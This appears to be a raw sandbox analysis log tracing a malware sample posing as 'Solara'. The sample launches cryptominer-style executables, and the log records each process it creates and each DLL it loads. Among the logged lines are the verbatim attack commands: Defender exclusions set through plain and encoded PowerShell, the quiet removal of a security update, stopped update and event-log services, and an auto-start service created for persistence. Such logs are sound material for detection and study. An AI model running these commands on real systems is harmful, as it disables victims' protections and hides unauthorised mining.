Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\Solara.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: slc.dllJump to behavior
